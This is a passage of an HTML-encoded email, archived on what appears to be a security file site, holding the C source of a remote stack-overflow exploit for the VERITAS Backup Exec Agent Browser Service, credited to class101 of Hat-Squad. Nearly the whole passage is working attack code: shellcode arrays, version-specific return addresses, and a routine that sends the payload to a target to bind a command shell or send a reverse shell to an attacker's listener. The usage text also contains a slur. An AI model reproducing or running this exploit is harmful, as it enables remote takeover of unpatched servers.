\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"<BR>"\xff\x5e\xe8\x47\xf=
f\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"<BR>"\xe8\x=
a5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5=
f"<BR>"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\x=
ff\xb8\x01\x63"<BR>"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\=
x90\x01\x2b\xe0\x54\x83\xc0"<BR>"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50=
\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"<BR>"\x68\x7f\x01\x01\x01\xb8\x0=
2\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"<BR>"\x53\x56\xff\x=
55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"<BR>"\=
x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x=
77\x44"<BR>"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\=
x55\x08\xf7\xd0\x50"<BR>"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff=
\x55\x0c\x90\x90\x90\x90\x90\x90"<BR>"\x90\x90\x90\x90\x90\x90\x90\x90\x9=
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"<BR>"\x90\x90\x90\x90\x90\x=
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"<BR>"\x90\x90\=
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"<=
BR>"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\=
x90\x90\x90"<BR>"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90\x90\x90\x90\x90";</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><BR>char scode2[]=3D<BR><A=20
href=3D"file://HD.Moore">file://HD.Moore</A> Shellcode<BR><A=20
href=3D'file://"\x90'>file://"\x90</A>"&nbsp;&nbsp; uncomment this if =
you have=20
scode detection problem on slows connections or try more NOP,<BR><A=20
href=3D"file://but">file://but</A> for me and some other guys its =
already fine=20
like=20
this.<BR>"\xEB"<BR>"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\=
xF4\xEB\x05\xE8\xEC\xFF\xFF"<BR>"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF=
\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"<BR>"\xF0\x89\x62\x03\xC2\x90\x0=
3\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"<BR>"\x77\x74\xB9\x=
48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"<BR>"\=
xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x=
03\x89"<BR>"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\=
xD1\xEC\x03\x91\x03"<BR>"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0=
\x06\xC6\x86\x64\x77\x5E\x01\x4F"<BR>"\x09\x64\x88\x89\x88\x88\xDF\xDE\xD=
B\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"<BR>"\x3E\x91\x90\x6F\x2C\x=
91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"<BR>"\x51\x81\=
x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"<=
BR>"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\=
x77\xDD\x8C"<BR>"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8=
\xB9\x48\xD8\xD8\xD8\xD8"<BR>"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x5=
3\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"<BR>"\xE2\x98\xD8\xDF\x77\xDD\xAC\x=
DB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"<BR>"\xE0\xCB\xC5\xCC\=
x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"<BR>"\x0F=
\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\=
x89"<BR>"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98=
\xDC\xD8\xD9\xD9"<BR>"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xF=
A\x76\x3B\x9E\x77\xDD\x8C\x77"<BR>"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x=
8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"<BR>"\x77\x77\xBE\x77\x5B\x77\=
xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"<BR>"\x58\x68\x61=
\x63\x6B\x90";&nbsp;=20
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>static char payload[800];<BR>char=20
v91sp0sp1[]=3D"\xFF\x50\x11\x40";<BR>char =
esisp0sp1[]=3D"\xA1\xFF\x42\x01";<BR>char=20
v85[]=3D"\xFF\x38\x11\x40";<BR>char =
esiold[]=3D"\xB9\x08\x43\x01";</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>char talk[]=20
=3D<BR>"\x02\x00\x32\x00"<BR>"\x90\x90\x90\x90"<BR>"\x31\xF6\xC1\xEC\x0C\=
xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"<BR>"\x24\xFE\x31\xD2\x52\x42=
\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"<BR>"\x00\xC1\xE8\x08\xFF\x10\x8=
5\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"<BR>"\xE1\xFF\xE7\x90\x90\x90\x90\x=
90\x90\x90\x90\x90\x90\x90\x90\x90"<BR>"\x90\x90\x90\x90\x90\x90\x90\x90\=
x90\x90\x90\x90\x90\x90\x90\x90"<BR>"\x90\x90\x90\x90\x90\x90\x90\x90\x90=
\x90\x90\x90\x90\x90\x90\x90"<BR>"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9=
0\x90\x90\x90\x90"<BR>"\x00"<BR>"1.1.1.1.1.1"<BR>"\x00"<BR>"\xEB\x80";</F=
ONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef WIN32<BR>&nbsp;WSADATA=20
wsadata;<BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>void ver();<BR>void usage(char* =
us);</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>int main(int argc,char=20
*argv[])<BR>{<BR>&nbsp;ver();<BR>&nbsp;unsigned long =
gip;<BR>&nbsp;unsigned=20
short gport;<BR>&nbsp;char *os;<BR>&nbsp;if=20
(argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv=
[0]);return=20
-1;}&nbsp;<BR>&nbsp;if (argc=3D=3D5){usage(argv[0]);return=20
-1;}&nbsp;<BR>&nbsp;&nbsp;&nbsp; if =
(strlen(argv[2])<7){usage(argv[0]);return=20
-1;}&nbsp;<BR>&nbsp;&nbsp;&nbsp; if=20
(argc=3D=3D6)<BR>&nbsp;{<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
if=20
(strlen(argv[4])<7){usage(argv[0]);return =
-1;}&nbsp;<BR>&nbsp;}<BR>#ifndef=20
WIN32<BR>&nbsp;if=20
(argc=3D=3D6)<BR>&nbsp;{<BR>&nbsp;&nbsp;&nbsp;gip=3Dinet_addr(argv[4])^(l=
ong)0x00000000;<BR>&nbsp;&nbsp;gport=3Dhtons(atoi(argv[5]))^(short)0x0000=
;<BR>&nbsp;}<BR>#define=20
Sleep&nbsp;&nbsp;sleep<BR>#define SOCKET&nbsp;&nbsp;int<BR>#define=20
closesocket(s) close(s)<BR>#else<BR>&nbsp;if=20
(WSAStartup(MAKEWORD(2,0),&wsadata)!=3D0){printf("[+] wsastartup=20
error\n");return -1;}<BR>&nbsp;if=20
(argc=3D=3D6)<BR>&nbsp;{<BR>&nbsp;&nbsp;gip=3Dinet_addr(argv[4])^(ULONG)0=
x00000000;<BR>&nbsp;&nbsp;gport=3Dhtons(atoi(argv[5]))^(USHORT)0x0000;<BR=
>&nbsp;}<BR>#endif<BR>&nbsp;int=20
ip=3Dhtonl(inet_addr(argv[2])), port;<BR>&nbsp;if=20
(argc=3D=3D4||argc=3D=3D6){port=3Datoi(argv[3]);} else =
port=3D6101;<BR>&nbsp;SOCKET s;fd_set=20
mask;struct timeval timeout; struct sockaddr_in=20
server;<BR>&nbsp;s=3Dsocket(AF_INET,SOCK_STREAM,0);<BR>&nbsp;if=20
(s=3D=3D-1){printf("[+] socket() error\n");return -1;}&nbsp;<BR>&nbsp;if =

(atoi(argv[1])=3D=3D1) {memcpy(&talk[37], &v91sp0sp1,=20
4);memcpy(&talk[72], &esisp0sp1, 4);os=3D"Backup Exec=20
v9.1.4691.1\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;=20
Backup Exec v9.1.4691.0";}<BR>&nbsp;else {memcpy(&talk[37], =
&v85,=20
4);memcpy(&talk[72], &esiold, 4);os=3D"Backup Exec=20
v8.5.3572";}<BR>&nbsp;if=20
(argc=3D=3D6)<BR>&nbsp;{<BR>&nbsp;&nbsp;memcpy(&scode1[282], =
&gip,=20
4);<BR>&nbsp;&nbsp;memcpy(&scode1[289], &gport,=20
2);<BR>&nbsp;&nbsp;strcat(payload,scode1);<BR>&nbsp;}<BR>&nbsp;else=20
strcat(payload,scode2);<BR>&nbsp;printf("[+] target(s):=20
%s\n",os);&nbsp;&nbsp;&nbsp;<BR>&nbsp;server.sin_family=3DAF_INET;<BR>&nb=
sp;server.sin_addr.s_addr=3Dhtonl(ip);<BR>&nbsp;server.sin_port=3Dhtons(p=
ort);<BR>&nbsp;connect(s,(=20
struct sockaddr=20
*)&server,sizeof(server));<BR>&nbsp;timeout.tv_sec=3D3;timeout.tv_use=
c=3D0;FD_ZERO(&mask);FD_SET(s,&mask);<BR>&nbsp;switch(select(s+1,=
NULL,&mask,NULL,&timeout))<BR>&nbsp;{<BR>&nbsp;&nbsp;case=20
-1: {printf("[+] select() error\n");closesocket(s);return=20
-1;}<BR>&nbsp;&nbsp;case 0: {printf("[+] connect()=20
error\n");closesocket(s);return=20
-1;}<BR>&nbsp;&nbsp;default:<BR>&nbsp;&nbsp;if(FD_ISSET(s,&mask))<BR>=
&nbsp;&nbsp;{<BR>&nbsp;&nbsp;&nbsp;printf("[+]=20
connected, constructing the payload...\n");<BR>&nbsp;&nbsp;&nbsp;if=20
(send(s,talk,sizeof(talk)-1,0)=3D=3D-1) { printf("[+] sending error 1, =
the server=20
prolly rebooted.\n");return -1;}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(10);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep=
(1/100);<BR>#endif<BR>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
2, the=20
server is patched.\n");return -1;}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(10);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep=
(1/100);<BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
3, the=20
server is patched.\n");return -1;}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(10);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep=
(1/100);<BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
4, the=20
server is patched.\n");return -1;}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(10);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep=
(1/100);<BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
5, the=20
server is patched.\n");return -1;}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(10);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep=
(1/100);<BR>#endif<BR>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
6, the=20
server is patched.\n");return -1;}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(10);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep=
(1/100);<BR>#endif<BR>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
7, the=20
server is patched.\n");return -1;}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(10);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep=
(1/100);<BR>#endif<BR>&nbsp;&nbsp;&nbsp;if=20
(send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending error =
8, the=20
server is patched.\n");return -1;}<BR>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(1000);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sle=
ep(1);<BR>#endif&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;printf("[+]=20
size of payload:=20
%d\n",(sizeof(talk)-1)+strlen(payload)*7);&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nb=
sp;&nbsp;printf("[+]=20
payload sent.\n");<BR>&nbsp;&nbsp;&nbsp;return=20
0;<BR>&nbsp;&nbsp;}<BR>&nbsp;}<BR>&nbsp;closesocket(s);<BR>#ifdef=20
WIN32<BR>&nbsp;WSACleanup();<BR>#endif<BR>&nbsp;return =
0;<BR>}</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><BR>void usage(char* us) <BR>{&nbsp;=20
<BR>&nbsp;printf("USAGE:\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;=20
[+]&nbsp; . 101_BXEC.exe Version=20
VulnIP\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; .=20
101_BXEC.exe Version VulnIP=20
VulnPORT\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; =
.=20
101_BXEC.exe Version VulnIP VulnPORT GayIP=20
GayPORT\n");<BR>&nbsp;printf("VERSION:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =

\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Backup Exec =

v9.1.4691.SP1\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] =
1. Backup=20
Exec v9.1.4691.SP0\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
[+] 2.=20
Backup Exec=20
v8.5.3572\n");<BR>&nbsp;printf("TARGET:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; . =
2k3/2k/XP/NT4=20
universal=20
(*)\n");<BR>&nbsp;printf("NOTE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The exploit bind a =

cmdshell port 101 =
or\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
reverse a cmdshell on your=20
listener.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A =
wildcard (*)=20
mean tested =
working.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
Compilation msvc6, cygwin, Linux.\n");<BR>&nbsp;return;<BR>} <BR>void=20
ver()<BR>{&nbsp;<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[0.4=
]=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DVERITAS Backup Exec =
8.x/9.x=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");=20
<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
=3D=3D=3D=3D=3D=3D=3D=3D=3DAgent=20
Browser Service, Remote Stack=20
Overflow=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3Dcoded by =
class101=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[Hat-Squad.com=20
2005]=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;=20
\n");<BR>}<BR></FONT></DIV>
<DIV><FONT face=3DArial=20
size=3D2>-------------------------------------------------------------<BR=
>class101<BR>Hat-Squad.com<BR>-------------------------------------------=
------------------</FONT></DIV></BODY></HTML>

------=_NextPart_000_003D_01C4F7DA.972C2380--

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close